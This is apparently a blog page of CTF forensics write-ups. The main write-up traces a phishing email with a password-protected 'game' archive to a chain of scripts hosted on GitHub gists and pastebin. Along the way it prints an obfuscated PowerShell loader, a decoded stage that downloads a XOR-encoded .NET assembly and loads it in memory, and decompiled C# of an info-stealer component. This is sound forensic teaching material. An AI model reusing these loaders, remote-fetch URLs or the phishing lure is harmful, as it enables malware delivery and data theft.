Posts on Library of Devoruina

UTCTF

Tue, 17 Mar 2026 20:13:41 +0700

Overview

All of these challenges are parts of a single forensics case, of which the same KAPE triage artifact is given.
Tools used:
- FTK Imager.
- SQLite Browser.
- MFTECmd.
- MFTExplorer.
- Timeline Explorer
- PECmd.
- RegRipper.
- Windows Event Viewer.

Pre-analysis

We first start by parsing the Master File Table ($MFT) as it writes a records of all data that was created and modified on the system, which can aid us a lot in our analysis process.
The tool we will be using for this is MFTECmd.exe

PLAINTEXT

$ MFTECmd.exe -f '.\$J' -m '$MFT' --csv ".\" --csvf MFT.csv

This outputs MFT.csv, which we can then view with Timeline Explorer.

Landfall

Description

Hello operator, in the .zip file is a triage of the desktop breached by the threat actors. It seems like they were able to physically login, so we think there’s an insider threat amongst the employees.

VSL CTF

Mon, 26 Jan 2026 07:34:46 +0700

The Joy Of Nostalgia

Description

A data leak is suspected to stem from poor configuration management on a WebOS workstation. The engineer in charge reported executing a Registry Wipe procedure to sanitize sensitive data related to ticket SEC-2024-1837.

WannaGame Championship 2025

Tue, 09 Dec 2025 14:06:48 +0700

PLAINTEXT

 __ __ ____ _________ .__ .__ .__ .__ ._.
/ \ / \/_ | \_ ___ \| |__ _____ _____ ______ |__| ____ ____ _____| |__ |__|_____ | |
\ \/\/ / | | / \ \/| | \\__ \ / \\____ \| |/ _ \ / \ / ___/ | \| \____ \ | |
 \ / | | \ \___| Y \/ __ \| Y Y \ |_> > ( <_> ) | \\___ \| Y \ | |_> > \|
 \__/\ / |___| \______ /___| (____ /__|_| / __/|__|\____/|___| /____ >___| /__| __/ __
 \/ \/ \/ \/ \/|__| \/ \/ \/ |__| \/

Hide and Seek

“I just searched and downloaded some files, but I found some suspicious process created. Please help me find out.”

Category: Forensics.

CSCV Finals 2025

Thu, 27 Nov 2025 14:40:00 +0700

Introduction

Huge thank to @tr4c3datr4il for giving me the opportunity to solve these challenges despite me not participating in the contest.

Case Charlie

CSCV Qualification 2025

Sat, 25 Oct 2025 06:48:00 +0700

NostalgiaS

We are given an .ad1 image.
Mount it, navigate into Users/kadoya/AppData/Local/Microsoft/Outlook/, we can read the emails that were sent to Mr. Kadoya.
Inside one of them reads:

PLAINTEXT

Hi player,

I’m sharing something special with you today — a piece of childhood we all loved: the game Moly.

Moly tells the touching story of a red-nosed mole and its friend Dau Dau. Together, they escape a burning forest and rebuild their lives in a peaceful snowy land — growing crops, raising animals, and building a new home filled with warmth and friendship.

For many of us, Moly wasn’t just a game. It was a memory — quiet evenings, simple adventures, and that gentle happiness only old games can bring.

You can find the game file attached. Password: playmoly2025.

 Run game by click "playmoly".

I hope you’ll take a moment to revisit this little world — and relive the feeling of those days again.

Enjoy your journey,

ACE

Team Moly

Which tells us that Mr.Kadoya ran a hidden malware inside playmoly.
By extracting the archive from the mailbox, we unzip the file with the password: playmoly2025
Inside the file is a script that contains a peculiar line:

JAVASCRIPT

var remoteHtaUrl = 'https://gist.githubusercontent.com/oumazio/ad5626973af6118062ae401c1e788464/raw/725302cda73d10e260e2ed0f26d935e576d3bc1c/FlashInstaller.hta';

By accessing the link, we are met with yet another file, this time containing the so-called “game code”. Upon further inspection, the file connects to another Github GIST

JAVASCRIPT

var logo = "https://gist.githubusercontent.com/oumazio/d2b2cbbe1ad51fd956815e78e6bfe31d/raw/2e34af3f8aac3392f07a1d59013cc8897dda8f3a/something.txt";

Accessing the link hands us yet another script, this time heavily obfuscated. Upon even further inspection, the script downloads another script.

BASH

$ grep 'https' something.txt
https://gist.githubusercontent.com/oumazio/fdd0b2711ab501b30b53039fa32bc9ca/raw/ca4f9da41c5c64b3b43f4b0416f8ee0d0e400803/secr3t.txt

Inside is yet another obfuscated script.

POWERSH

Iex(neW-obJecT iO.cOMPrESsion.DeflaTEStreAM([iO.meMORysTrEAM] [convErt]::FroMbase64sTrInG('hVNhb9owEP2OxH+wUCSCIIZO06Qy7QNt1a1rxyZg6ybEJic5iFfHzhxTiLr+953BlKSgNV+i3N17797lzhvkOaShKL5qQd6RRmJMlve73YzlBkIuaaTSrmar7mnvD/wYfxg06jXvu9LXUGB5b/3qNX5PigyGLAVLMDbABOiPTDKOYA10xGPQ1zy6s9BPYBIV74pHS4nBes3ogjzUawQf7xbCc8FBGiwYwir4HP6GyJBxgQ2ldAiGPlU4BMhIxRCfK2m2sD0HvVArKRSLx0ZzufC9kt3Wc0F6wfNM5eC7jMsnsP7GxBJyy1zVohPNU79FgjwT3JBmp0n+ktsENOzafiDeLxKkzEQJaf7srae94HQQXLJgPmt7TfJYUXLkZ4XZiJXchxiazkq90BuQC5NsgXOlie9x+0PeEnwHwhyW2ky73drN+UBw6vEZMkzR2j1oM+v3J8om/D2TLXGWO+TkjRtT1YPSfMElE/8xUVZ92ceR6mNWKrrOy6G/IFyjhlvgY+0ztx92Em7lRjAX2D5Xku62B4dzg0vlV1Ura8PnaOXpMAIJpNEgAZMxKd/ANl51YphegLFQa2HXEH2/je1JWyVMuqG8knNlMXsGi9rK+SXZzjFvZ1zGeCKXgi1y9Dc2zPAIB4bzern6yzIUPDreEb2S9+oOG5dLITpk83q+Oo8k2pyImwOs8ZpOMPwP' ) ,[SYSTeM.io.comPRESsion.COmPRessiONmODe]::DECompResS) |FOReach-oBJeCt{ neW-obJecT SyStEM.Io.STreAmREaDeR( $_,[TEXT.EncOdiNG]::ascIi ) }| FOreacH-objeCT{$_.rEAdToeND( ) })

The script is compressed with zlib and encoded with base64, we can decrypt it with:

PYTHON

 $ sh -c -- "python3 - << 'PY'
 import base64, zlib, pathlib, sys
 b64 = pathlib.Path('script.txt').read_text().strip()
 data = base64.b64decode(b64)
 text = zlib.decompress(data, -zlib.MAX_WBITS).decode('ascii', errors='replace')
 pathlib.Path('decoded.txt').write_text(text)
 PY"

The decoded file reads:

JAVA

$AssemblyUrl = "https://pastebin.com/raw/90qeYSHA"
$XorKey = 0x24
$TypeName = "StealerJanai.core.RiderKick"
$MethodName = "Run"

try {
 $WebClient = New-Object System.Net.WebClient
 $encodedContent = $WebClient.DownloadString($AssemblyUrl)
 $WebClient.Dispose()

 $hexValues = $encodedContent.Trim() -split ',' | Where-Object { $_ -match '^0x[0-9A-Fa-f]+$' }

 $encodedBytes = New-Object byte[] $hexValues.Length
 for ($i = 0; $i -lt $hexValues.Length; $i++) {
 $encodedBytes[$i] = [Convert]::ToByte($hexValues[$i].Trim(), 16)
 }

 $originalBytes = New-Object byte[] $encodedBytes.Length
 for ($i = 0; $i -lt $encodedBytes.Length; $i++) {
 $originalBytes[$i] = $encodedBytes[$i] -bxor $XorKey
 }

 $assembly = [System.Reflection.Assembly]::Load($originalBytes)

 if ($TypeName -ne "" -and $MethodName -ne "") {
 $targetType = $assembly.GetType($TypeName)
 $methodInfo = $targetType.GetMethod($MethodName, [System.Reflection.BindingFlags]::Static -bor [System.Reflection.BindingFlags]::Public)
 $methodInfo.Invoke($null, $null)
 }

} catch {
 exit 1
}

We are met with yet another script downloader, this time the script is obfuscated with XOR.

JAVA

$AssemblyUrl = "https://pastebin.com/raw/90qeYSHA"
$XorKey = 0x24

After decoding, the script gives us a .NET binary, which we have to reverse engineer. The script seems to be an information collect, which have a component named StealerJanai.component.systeminfo.SystemSecretInformationCollector.cs, which reads:

CSHARP

// StealerJanai, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// StealerJanai.component.systeminfo.SystemSecretInformationCollector
using System;
using System.Collections.Generic;
using System.Text;
using Microsoft.Win32;

public class SystemSecretInformationCollector
{
	private const string MagicChars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

	public string Collect()
	{
		StringBuilder stringBuilder = new StringBuilder();
		try
		{
			string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83");
			string machineName = Environment.MachineName;
			string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN");
			string registryValue = GetRegistryValue();
			string value = text + machineName + "_" + text2 + registryValue + "}";
			stringBuilder.Append(value);
		}
		catch (Exception ex)
		{
			stringBuilder.AppendLine($"Error: {ex.Message}");
		}
		return stringBuilder.ToString();
	}

	private string DecodeMagicToString(string input)
	{
		try
		{
			if (string.IsNullOrEmpty(input))
			{
				return string.Empty;
			}
			List<byte> list = new List<byte>();
			foreach (char value in input)
			{
				int num = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".IndexOf(value);
				if (num < 0)
				{
					return "Invalid character";
				}
				int num2 = num;
				for (int num3 = list.Count - 1; num3 >= 0; num3--)
				{
					int num4 = list[num3] * 62 + num2;
					list[num3] = (byte)(num4 % 256);
					num2 = num4 / 256;
				}
				while (num2 > 0)
				{
					list.Insert(0, (byte)(num2 % 256));
					num2 /= 256;
				}
			}
			int j;
			for (j = 0; j < list.Count && list[j] == 0; j++)
			{
			}
			if (j >= list.Count)
			{
				return string.Empty;
			}
			byte[] array = new byte[list.Count - j];
			for (int k = 0; k < array.Length; k++)
			{
				array[k] = list[j + k];
			}
			return Encoding.ASCII.GetString(array);
		}
		catch (Exception ex)
		{
			return "Decode error: " + ex.Message;
		}
	}

	private string GetRegistryValue()
	{
		try
		{
			using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n"))
			{
				if (registryKey != null)
				{
					object value = registryKey.GetValue("");
					if (value != null)
					{
						return value.ToString();
					}
				}
			}
			return "Registry key not found";
		}
		catch (Exception ex)
		{
			return "Registry error: " + ex.Message;
		}
	}
}

// StealerJanai, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // StealerJanai.component.systeminfo.SystemSecretInformationCollector using System; using System.Collections.Generic; using System.Text; using Microsoft.Win32; public class SystemSecretInformationCollector { private const string MagicChars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; public string Collect() { StringBuilder stringBuilder = new StringBuilder(); try { string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83"); string machineName = Environment.MachineName; string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN"); string registryValue = GetRegistryValue(); string value = text + machineName + "_" + text2 + registryValue + "}"; stringBuilder.Append(value); } catch (Exception ex) { stringBuilder.AppendLine($"Error: {ex.Message}"); } return stringBuilder.ToString(); } private string DecodeMagicToString(string input) { try { if (string.IsNullOrEmpty(input)) { return string.Empty; } List<byte> list = new List<byte>(); foreach (char value in input) { int num = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".IndexOf(value); if (num < 0) { return "Invalid character"; } int num2 = num; for (int num3 = list.Count - 1; num3 >= 0; num3--) { int num4 = list[num3] * 62 + num2; list[num3] = (byte)(num4 % 256); num2 = num4 / 256; } while (num2 > 0) { list.Insert(0, (byte)(num2 % 256)); num2 /= 256; } } int j; for (j = 0; j < list.Count && list[j] == 0; j++) { } if (j >= list.Count) { return string.Empty; } byte[] array = new byte[list.Count - j]; for (int k = 0; k < array.Length; k++) { array[k] = list[j + k]; } return Encoding.ASCII.GetString(array); } catch (Exception ex) { return "Decode error: " + ex.Message; } } private string GetRegistryValue() { try { using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n")) { if (registryKey != null) { object value = registryKey.GetValue(""); if (value != null) { return value.ToString(); } } } return "Registry key not found"; } catch (Exception ex) { return "Registry error: " + ex.Message; } } }

From this clue:

CSHARP

string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83");
string machineName = Environment.MachineName;
string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN");
string registryValue = GetRegistryValue();
string value = text + machineName + "_" + text2 + registryValue + "}";

The flag format seems to be <text1_decoded>_<machineName>_<text2_decoded><registryValue>}
Decoding the text with script gives us:
- text1: CSCV2025{your_computer_
- text2: has_be3n_kicked_by
Which gives us: CSCV2025{your_computer_<machineName>_has_be3n_kicked_by<registryValue>}
To find the machine name, we can read the logs.

BASH

$ evtx_dump 'Windows/System32/winevt/Logs/Application.evtx' | grep '<Computer>'
<Computer>DESKTOP-47ICHL6</Computer>

Which gives us: DESKTOP-47ICHL6
Finally, we need to get the registry value.

CSHARP

using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n"))

The registry is under SOFTWARE\\hensh1n, which we can read with hivex

BASH

$ hivexget 'Users/kadoyat/NTUSER.DAT' 'SOFTWARE\\hensh1n'
"@"="HxrYJgdu"

Which gives us HxrYJgdu, combining all of them gives us the flag.

Flag: CSCV2025{your_computer_DESKTOP-47ICHL6_has_be3n_kicked_byHxrYJgdu}

WannaGame Freshmen 2025

Sun, 12 Oct 2025 12:20:16 +0700

CatWithASteg

We are given a file named hiden.jpg, which is an invalid .jpg file.
Reading the file’s header, we are met with:

BASH

$ hexdump -C hiden.jpg | head
00000000 01 23 45 67 89 01 23 45 67 89 01 23 45 67 89 01 |.#Eg..#Eg..#Eg..|
00000010 23 45 67 89 aa aa aa aa ff 8d ff 0e 00 10 4a 46 |#Eg...........JF|
00000020 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 00 be |IF.....`.`......|
00000030 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 |Exif..MM.*......|
00000040 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 |................|
00000050 00 00 00 01 00 00 00 56 01 1b 00 05 00 00 00 01 |.......V........|
00000060 00 00 00 5e 01 28 00 03 00 00 00 01 00 02 00 00 |...^.(..........|
00000070 02 13 00 03 00 00 00 01 00 01 00 00 87 69 00 04 |.............i..|
00000080 00 00 00 01 00 00 00 66 00 00 00 00 00 00 00 60 |.......f.......`|
00000090 00 00 00 01 00 00 00 60 00 00 00 01 00 06 90 00 |.......`........|

We can see garbage date from line 0 to 10, from 01 to aa. To fix this, we need to extract the image by writing this file to another file, but skipping the first 24 bytes.

$ dd if=hiden.jpg of=fixed.jpg bs=1 skip=24
5857+1 records in
5857+1 records out
140589 bytes (141 kB, 137 KiB) copied, 0.000000000001 s, 9999.99 TB/s

However, it’s still not a valid image because byte at 02 and 04 are wrong. Using tools like dhex, we fix the two bytes 8d and 0e into d8 and e0, the resulting image is:

Flag: W1{Y0u_4r3_v3ry_g00d_m3ow!}